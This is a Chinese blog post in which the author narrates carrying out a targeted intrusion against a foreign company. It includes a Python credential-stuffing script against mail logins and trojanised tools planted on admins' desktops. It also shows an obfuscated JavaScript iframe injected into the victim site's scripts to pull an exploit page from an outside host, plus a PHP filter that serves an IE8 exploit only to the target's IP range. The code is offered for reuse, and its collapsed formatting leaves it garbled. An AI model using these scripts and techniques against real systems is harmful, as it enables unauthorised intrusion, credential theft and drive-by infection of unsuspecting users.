在这里插入图片描述
写在之前的废话:小菜技术能力不行,如果你觉得此文实在看不下去,还请PASS掉。如果你对我的文章有兴趣,可以与我一起交流。文章因为敏感无图,业内人士看看自然懂。在这里感谢一下那位一直在我背后默默指导我的那位大牛,要不是你,就不会有今天我,借这这个平台向你衷声说句:谢谢你!

由于APT耗时长,需要的支持多,而且目标敏感。在这里,我们不便介绍目标背景,也不多说其他的,直接来进入主题。

某国某目标,我盯了它大概半年。嗯,终于有一天,我觉得时机成熟,下手吧。

在渗透目标的前期,我们需要了解对方公司的安全意识。以及需要搜集所有网站的IP,公司的出口,以及公司网段所存在的B-C段,公司人员邮箱,公司人员爱好,facebook等信息。

首先,我把目标公司的WEB都给搜集好了,大公司一般C段都是在一起的。而我有个习惯,在渗透目标的时候,先喜欢把OWA的段找出来扫一下。这样大概的就知道了公司的架构情况。而很多时候,大公司都是会把WEB段给区分的,哪几个外网IP段是管理WEB的,哪几个段是放数据库的。不过随着网络越趋复杂,就算拿到了WEB 也就是在DMZ徘徊。不过只要拿到了WEB就好说了。Go把。

千辛万苦拿下来了这个公司的一个WEB,WEB如何拿下来咱们不多说。不是重点。当我分析内网情况的时候,环境就是在DMZ,system权限。通过判断协议,TCP HTTP都没问题。于是,我把DMZ WEB给中了一个马,这样更容易操作,至少得到了一个交互式的shell。先把远控抛开不说,通过netstat -ano分析。WEB服务器连上了在内部的一台数据库服务器。于是我找到了WEB服务器的web.config脚本,成功得到了数据库账户密码,但是数据库账户权限非SA,而且SQL SERVER版本是2008(悲剧,MSSQL 2000的话直接就远程溢出了).没办法,就算我们导了个shell,又有何用?不着急,慢慢分析,于是我试着去ping内网数据库机器,PING不通,接着我在拿S扫描器开了很小的线程,扫了扫WEB连接的数据库那台机器。和我猜想的结果是一样,这种情况我不是第一次碰到了。就只有个1433能够过去。这时,我猜想大概的内网架构是这样的:

WEB–>防火墙–>数据库服务器–>内网(而当我搞下来,发现情况并不是这样的)

算了,没办法。先不管了,连上数据库,分析数据,看能否去撞号,登OWA或者邮箱之类的。

于是写了个PYTHON脚本,去跑他们的OWA(这个脚本是N年前写的,可能不太符合,大家去改改就好了。原理差不多):

import smtplib ,sys ,timedef main():server = "smtp.live.com" #gmail smtp.gmail.com, yahoo smtp.mail.yahoo.comfp = open("D:\python\\hotmail.txt")fp1 = open("d:\python\\save.txt", 'a+')while 1:line = fp.readline()uandp = line.split(' ')name = uandp[0]name = name.split('@')[0]pwd = uandp[1]pwd = pwd.split("\n")[0]try:smtp = smtplib.SMTP_SSL(server,465)  # gmail 465except:print "[*]Connect Error."sys.exit(0)passtry:#smtp.set_debuglevel(1)#smtp.ehlo()#smtp.starttls()smtp.ehlo()smtp.login(name,pwd)except:print "[-]:%s:%s" % (name, pwd)pass#time.sleep(1)else:out = "[+]:%s:%s\n" % (name, pwd)print outfp1.write(out)fp1.flush()smtp.quit()smtp.close()fp.close()fp1.close()if __name__=="__main__":main()

分析完数据,把数据库中的目标人物邮箱都给挑选出来。跑完。手工测试VPN,都失败了。没办法,继续另寻其他的路子。

来回到远控,通过分析,本机WEB有一个员工登录的地方,但是是.NET的。不能改代码。因为如果改写代码,需要重新编译(这里可能我说的有错。)但是有一个员工登录的地方我们就已经足够了,这里也先不管它。先分析再说。

我的远控是可以切换用户的,只要有用户在,可以切换到对方的用户下。首先分析了本地管理组的用户,抓密码。Query user 发现有几个用户在线。于是我切换到每个用户,主要就是查看IPC 。功夫不负有心人,当我切换到B的会话下的时候,NET USE看了看。大家猜我看到了啥?(可能你会想,咱们不是在DMZ吗?会话咋来的? 管理员从内网连过来。)

C:\ProgramData>net useNew connections will be remembered.Status       Local     Remote                    Network-------------------------------------------------------------------------------\\TSCLIENT\C              Microsoft Terminal Services\\TSCLIENT\D              Microsoft Terminal Services\\TSCLIENT\E              Microsoft Terminal Services\\TSCLIENT\F              Microsoft Terminal ServicesThe command completed successfully.

没错,管理员从内网连接过来,把盘给带过来了。这下有得玩了。于是我分析了连接过来的那个盘。通过netstat -ano 知道了带过盘来的那机器的IP。赶紧分析,知道了对方是管理员,在OWA的MAILBOX服务器上链接过来的。搞的多的就知道,MAILBOX是没WEB的,当然也有。MAILBOX主要的作用就是来存储MAIL的邮件数据。于是我CURL,S扫描了服务器的那个段。一样的,我DMZ怎么都过不去,而且对方常用端口也没开。如果开了,咱们直接复制个shell就过去,本地借用内网那台服务器执行命令就可以了。但是环境不允许我们这么容易就进入别人内网,扭转了几天,还是没办法,当我最后分析到另外一个盘符的时候,我竟然看到了IT服务器的一个盘,里面有IT部门的一部分密码。赶紧下载分析。这样,基本上我判断,域管可能在里面。于是我来到VPN,一个一个测试,竟然都失败了。心想:FUCK,肯定这个是一个小域,没有VPN可以有权限登录。然后在一个一个来测试OWA,竟然登录进去了一个。分析所有邮件,搜索关键字:PASSWORD FTP RDP SERVER,HACKER。等字眼。没有所获,就看到一封说近期有人在搞他们公司,需要加强安全防范的邮件(当然不是我。)。可能这时候很多人想:发邮件,绑马? 如果说你有0DAY或者免杀好的NDAY可以这样做。不然就是找死了。

这个时候,我还是信心满满的,不是有IT部门的盘吗? 嘿嘿,下载了几个常用的工具,比如VPN,补丁。绑马了,在传上去。还给CMD绑了个马,放到了MAILBOX的

c:\users\**\desktop

把每个用户桌面上都放了一个CMD.EXE。就不相信管理员不运行。

等啊等啊,等了差不多半个月。没任何反映,决定还是自己出手。不然就被动,连WEB掉了都不好了。

从网上找代码,自己改写了一个PHP,在WEB服务器上挂了一个探针。这里有个小知识:WEB服务器不是http协议的,而是https来进行访问的,所以我们需要找一个https的网站(绿标的那种),不然你是探针不到任何信息的。说做就做,HTTPS绿标的网站我多的是,而PHP代码简单,改写代码如下:

<?phpfunction getBrowse() { global $_SERVER; $Agent = $_SERVER['HTTP_USER_AGENT']; $browser = ''; $browserver = ''; $Browser = array('Lynx', 'MOSAIC', 'AOL', 'Opera', 'JAVA', 'MacWeb', 'WebExplorer', 'OmniWeb'); for($i = 0; $i <= 7; $i ++){ if(strpos($Agent, $Browsers[$i])){ $browser = $Browsers[$i]; $browserver = ''; } } if(ereg('Mozilla', $Agent) && ereg('Maxthon', $Agent)){ $temp = explode('Maxthon/', $Agent); $Part = $temp[1]; $temp = explode(' ', $Part); $browserver = $temp[0]; $browser = 'Maxthon'; } if(ereg('Mozilla', $Agent) && ereg('Chrome', $Agent) && !ereg('Maxthon', $Agent)){ $temp = explode('Chrome/', $Agent); $Part = $temp[1]; $temp = explode(' ', $Part); $browserver = $temp[0]; $browser = 'Chrome'; } if(ereg('Mozilla', $Agent) && ereg('Opera', $Agent)) { $temp = explode('(', $Agent); $Part = $temp[1]; $temp = explode(')', $Part); $browserver = $temp[1]; $temp = explode(' ', $browserver); $browserver = $temp[2]; $browserver = preg_replace('/([d.]+)/', '\1', $browserver); $browserver = $browserver; $browser = 'Opera'; } if(ereg('Mozilla', $Agent) && ereg('MSIE', $Agent)){ $temp = explode('(', $Agent); $Part = $temp[1]; $temp = explode(';', $Part); $Part = $temp[1]; $temp = explode(' ', $Part); $browserver = $temp[2]; $browserver = preg_replace('/([d.]+)/','\1',$browserver); $browserver = $browserver; $browser = 'Internet Explorer'; } if($browser != ''){ $browseinfo = $browser.' '.$browserver; } else { $browseinfo = 'Unknow Browser'; } return $browseinfo; } function getIP() {return isset($_SERVER["HTTP_X_FORWARDED_FOR"])?$_SERVER["HTTP_X_FORWARDED_FOR"]:(isset($_SERVER["HTTP_CLIENT_IP"])?$_SERVER["HTTP_CLIENT_IP"]:$_SERVER["REMOTE_ADDR"]);}function getOS () { global $_SERVER; $agent = $_SERVER['HTTP_USER_AGENT']; $os = false; if (eregi('win', $agent) && strpos($agent, '95')){ $os = 'Windows 95'; } else if (eregi('win 9x', $agent) && strpos($agent, '4.90')){ $os = 'Windows ME'; } else if (eregi('win', $agent) && ereg('98', $agent)){ $os = 'Windows 98'; } else if (eregi('win', $agent) && eregi('nt 6.1', $agent)){ $os = 'Windows 7'; }else if (eregi('win', $agent) && eregi('nt 6', $agent)){ $os = 'Windows Vista'; }  else if (eregi('win', $agent) && eregi('nt 5.1', $agent)){ $os = 'Windows XP'; } else if (eregi('win', $agent) && eregi('nt 5', $agent)){ $os = 'Windows 2000'; } else if (eregi('win', $agent) && eregi('nt', $agent)){ $os = 'Windows NT'; } else if (eregi('win', $agent) && ereg('32', $agent)){ $os = 'Windows 32'; } else if (eregi('linux', $agent)){ $os = 'Linux'; } else if (eregi('unix', $agent)){ $os = 'Unix'; } else if (eregi('sun', $agent) && eregi('os', $agent)){ $os = 'SunOS'; } else if (eregi('ibm', $agent) && eregi('os', $agent)){ $os = 'IBM OS/2'; } else if (eregi('Mac', $agent) && eregi('PC', $agent)){ $os = 'Macintosh'; } else if (eregi('PowerPC', $agent)){ $os = 'PowerPC'; } else if (eregi('AIX', $agent)){ $os = 'AIX'; } else if (eregi('HPUX', $agent)){ $os = 'HPUX'; } else if (eregi('NetBSD', $agent)){ $os = 'NetBSD'; } else if (eregi('BSD', $agent)){ $os = 'BSD'; } else if (ereg('OSF1', $agent)){ $os = 'OSF1'; } else if (ereg('IRIX', $agent)){ $os = 'IRIX'; } else if (eregi('FreeBSD', $agent)){ $os = 'FreeBSD'; } else if (eregi('teleport', $agent)){ $os = 'teleport'; } else if (eregi('flashget', $agent)){ $os = 'flashget'; } else if (eregi('webzip', $agent)){ $os = 'webzip'; } else if (eregi('offline', $agent)){ $os = 'offline'; } else { $os = 'Unknown'; } return $os; }

这里贴的PHP代码并非完整的,大家可以自己去改写。

脚本的功能是获取来源IP,OS,浏览器版本等等。当然如果你觉得还少,你可以加入探针JAVA,FLASH的一些功能。这里不在多说。

于是来到WEB主站,查看主页调用的JS。在JS里插入一段混淆代码。

eval(function(p,a,c,k,e,d){e=function©{return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!’’.replace(/^/,String)){while(c–)d[e©]=k[c]||e©;k=[function(e){return d[e]}];e=function(){return’\w+’};c=1;};while(c–)if(k[c])p=p.replace(new RegExp(’\b’+e©+’\b’,‘g’),k[c]);return p;}(‘5.6("<1 4=\“2://3//9.a\” 7=0 8=0></1>");’,11,11,’|iframe|https|xxx|src|document|write|height|width|Ie|php’.split(’|’),0,{}))

而原型如下:

document.write("<iframe src=“https://xxx//Ie.php” height=0 width=0></iframe>");

接下来我们要做的就是分析来源IP,等待了几天以后。我查看了探针的地址。记录了不少IP.但是那么多IP应该如何来确定哪个是他们的出口IP呢?

没办法,偷懒把,写了个PYTHON脚本:

#!/usr/bin/env python#-*- coding:utf-8 -*-import sysimport threadingimport httplibimport reimport timeclass Myclass(threading.Thread):def __init__(self,host,path):threading.Thread.__init__(self)self.host = hostself.path = pathself.result = []def run(self):if "https://" in self.host:conn = httplib.HTTPSConnection(self.host,80,None,None,False,10)else:conn = httplib.HTTPConnection(self.host,80,False,10)i_headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-Us; rv:1.9.1) Gecko/20090624 Firefox/3.5","Accept": "text/plain"}conn.request('GET',self.path,headers = i_headers)r1 = conn.getresponse()text = r1.read()text1 = text.lstrip()#size = text.count("\n")test = open('ip.txt','a+')test.write(text1)b = open("ip.txt",'r')c = open("ids.txt",'w')for line in b.readlines():m = re.search(r'(IP:\d*.\w*.\d*.\d*.\d*)',line)        mm =  m.group(0)owa = mm.replace("IP:","").strip().replace("\n","")self.result =  owa.replace("\n","")c.write(self.result)c.write("\n")#print "write success"g = open("ids.txt",'r')for lines in g.readlines():getsip =  lines.replace("\n","")try:conns = httplib.HTTPConnection("bgp.he.net",80,False,10)except Exception:print "[-]:connection out time"breakelse:conns.request('GET','/ip/%s' % getsip,headers = i_headers)r2 = conns.getresponse()texts = r2.read()try:line_split = re.search(r'(&lt;u&gt;.*\d+\D+.*.title=)',texts)obj =  line_split.group(0)print "server:",obj.replace("&lt;u&gt;","").replace("&lt;/u&gt;","").replace("\n","").replace("(&lt;a href=\"","search domain:").replace("\" title=","").replace("/dns/","")except Exception, e:passtime.sleep(5)#print line_splitdef main():if len(sys.argv) &lt; 3:print "[*]:Usage python info.py 127.0.0.1 /path"sys.exit(1)Mythread = Myclass(sys.argv[1],str(sys.argv[2]))Mythread.start()if __name__ == "__main__":main()

这个脚本的功能是先把目标网站记录的IP地址全部给读取下来,在本地保存为TXT,在循环依次读取一个IP,来到接口bgp.he.net 这个接口查询。至于如何分辨公司出口IP,不在多说了。看IP信息以及访问源就知道了。

成功获取到对方公司的出口IP,接下来就好办了。知道对方用的浏览器版本,OS,等等。

于是先决定先测试ie8的漏洞,网上找了个IE8的漏洞。本地WIN7 XP测试没问题(因为对方公司还是有人在用IE8,win7默认就是IE8)。但是网上找的IE8的漏洞都是被杀的不行的,于是心想,自己做把。

于是网上找了一个BASE64 JS解密脚本,把IE8的网马内写了几个函数,把核心代码都给放到函数里。然后直接把函数内都给BASE64加密了。OK,很简单把,不杀了。

但是我们在挂马的时候,并不是瞎挂。而是必须有针对性的挂,不然你挂上,杀毒软件一下把你样本给抓走了。改天又出这报告又出那报告的。多丢人。那就得需要一个定向挂马的脚本了。因为对方的HTTPS的,我VPS上没装HTTPS的证书,心想,直接就通过WEBSHELL把这串代码放到绿标的HTTPS网站上就好了。

定向挂马脚本如下:

function check_ip(){$ALLOWED_IP=array('192.168.2.*','目标公司出口IP');$IP=getIP();$check_ip_arr= explode('.',$IP);if(!in_array($IP,$ALLOWED_IP)) {foreach ($ALLOWED_IP as $val){if(strpos($val,'*')!==false){$arr=array();$arr=explode('.', $val);$bl=true;for($i=0;$i&lt;4;$i++){if($arr[$i]!='*'){if($arr[$i]!=$check_ip_arr[$i]){$bl=false;break;}}}if($bl){return;die;}}}header('HTTP/1.1 403 Forbidden');exit();die;} else{}

脚本的else后头,就是调用的那个网马了。

我把这个脚本和IE网马都给放到了绿标的网站上,于是重新在目标网站上,把探针去了。加入咱们的PHP脚本地址,远程调用。接下来要做的事情就是等着把。

谁没成想:刚挂上没5分钟,目标公司人中了我的网马,上线了。擦噢,这人品,不是一般的好。

赶紧把代码给取了。做内网渗透去了。而当我们到达内网的时候,内网情况却是这样的

DMZ-> WAF-> mailbox(我来到了这台服务器上)-> IDS/IPS-> 另外的域-> 主域

妈的额,好麻烦。没办法啦。之前拿下来了IT的管理密码的清单,先把当前域搞下来再说。毫无悬念的,直接连上了当前的域,控制了OWA SERVER。擦屁股走人,远控上操作去了。

虽然拿下来了这个域,但是这个域内就那么几十台个人机,而目标公司是几万人,看样子这个是他们的一个分的部门。只有继续深入了。

接下来我们要找的就是其余域的其他网段了,我ping了下目标公司的主站www.xxoo.com,嗯,内网IP地址是10.xx.xx.xx,嗯,虽然能够PING通,但是IPC这些都是不行的。接下来要做的就是打入其他域,搞定其他域,慢慢深入。

于是把目标个公司所有域名全部给搜集起来,在内网一个一个ping,把返回是内网的IP地址都给记录下来。

然后把朋友写的扫描器,指定线程,上去扫常用的WEB框架,数据库之类的东西。

预知后事如何,还请听下回分解。谢谢。

目前主域已经搞下来了,但是无奈没域管,好不容易抓到。但是被BIT9发现我了,把我又T出来了。还是得慢慢来,不着急,慢慢分析把。下回且听分析如何绕过防范不严的BIT9。

很多人看了文章可能会觉得我说的太笼统了,倒是。我不可能那么详细的说出来一些东西,但是如果你能够在这个文章里学习到新的思路,那就是我写这个文章的目的。

如果你喜欢我的文章,或者是思路。请关注我说说,我们可以一起交流和讨论。

转载注明 谢谢

[投稿]对某国的一次APT攻击过程相关推荐

  1. 八大典型APT攻击过程详解

    八大典型APT攻击过程详解 2013-08-27 17:55 启明星辰 yepeng 51CTO.com 字号:T | T APT攻击是近几年来出现的一种高级攻击,具有难检测.持续时间长和攻击目标明确 ...

  2. 专访趋势科技:全面解析APT攻击过程

    本文讲的是 :  专访趋势科技:全面解析APT攻击过程  ,  [IT168 评论]4月3日消息 日前,韩国多家大型银行及数家媒体相继受到黑客攻击,32000台计算机与服务器未能幸免,出现丢失画面的情 ...

  3. 近5年典型的的APT攻击事件

    APT攻击 APT攻击是近几年来出现的一种高级攻击,具有难检测.持续时间长和攻击目标明确等特征. 本文中,整理了近年来比较典型的几个APT攻击,并其攻击过程做了分析 (为了加深自己对APT攻击的理解和 ...

  4. 网络信息安全之APT攻击

    一.什么是APT攻击 当今,网络系统面临着越来越严重的安全挑战,在众多的安全挑战中,一种具有组织性.特定目标以及长时间持续性的新型网络攻击日益猖獗,国际上常称之为APT(Advanced Persis ...

  5. APT攻击原理和防范

    近年来APT攻击成为主要焦点:APT攻击是黑客以窃取核心资料为目的,针对企业发生的攻击和侵袭行业,APT攻击整合了情报技术.黑客技术.社会工程学等各种手段,对特定目标进行长期持续性网络攻击,项目的是访 ...

  6. APT攻击 --- 个人理解,仅供参考

    APT攻击是一个集合了多种常见攻击方式的综合攻击.综合多种攻击途径来尝试突破网络防御,通常是通过Web或电子邮件传递,利用应用程序或操作系统的漏洞,利用传统的网络保护机制无法提供统一的防御.除了使用多 ...

  7. 水抗攻击 apt攻击手段

    所谓"水坑攻击"是指黑客通过分析被攻击者的网络活动规律,寻找被攻击者经常访问的网站的弱点,先攻下该网站并植入攻击代码,等待被攻击者来访时实施攻击. 这种攻击行为类似<动物世界 ...

  8. 攻击链路识别——CAPEC(共享攻击模式的公共标准)、MAEC(恶意软件行为特征)和ATTCK(APT攻击链路上的子场景非常细)...

    结合知识图谱对网络威胁建模分析,并兼容MITRE组织的CAPEC(共享攻击模式的公共标准).MAEC和ATT&CK(APT攻击链路上的子场景非常细)等模型的接入,并从情报中提取关键信息对知识图 ...

  9. 什么是 APT 攻击

    APT(Advanced Persistent Threat)是指高级持续性威胁,本质是针对性攻击. 利用先进的攻击手段对特定目标进行长期持续性网络攻击的攻击形式,APT 攻击的原理相对于其他攻击形式 ...

最新文章

  1. Note:一些优化建议
  2. ubuntu10.0.4使用再生龙还原后在启动时不能正常启动
  3. 高并发之CAS机制和ABA问题
  4. POI Workbook接口和HSSFWorkbook对象和XSSFWorkbook对象操作相应excel版本
  5. 动态规划实现斐波那契数列求解
  6. [PAT乙级]1022 D进制的A+B
  7. JQuery Datatables editor 行内编辑功能
  8. 微服务SpringCloud系列
  9. Java并发工具类之CountDownLatch
  10. 云心html mac,萤石云视频Mac版
  11. python怎么读音发音英语翻译-python style是什么意思
  12. SPSS实现多因素方差分析
  13. i.MX6ULL 开发板在Ubuntu系统下实现串口通信
  14. 小程序switch大小怎么改
  15. K线形态识别—K线反转形态之头部反转形态
  16. 《英语语法新思维初级教程》学习笔记(八)一般时态
  17. rebase详解——非常精髓
  18. 计算机支架式教学案例,万紫千红总是春--支架式教学(网友来稿)
  19. NLP情感分析基础知识
  20. python画皮卡丘

热门文章

  1. 从深圳流水线女工到谷歌程序员:改变命运的人,都做对了什么?
  2. Android App 防止抓包
  3. selenium加载cookie报错问题:selenium.common.exceptions.InvalidCookieDomainException: Message: invalid cooki
  4. 曹洁 Spark编程Scala版本课后习题答案
  5. 群晖docker镜像源更换为阿里云镜像源
  6. vue如何创建vnode,VueJS渲染VNode
  7. pixi.js # 中文版基础教程
  8. 麒麟信安加入“商用密码证书可信计划” ,携手奇安信共筑国密生态安全
  9. 【pytorch】简单裂缝分割实验
  10. chatgpt API接口中文说明介绍(一)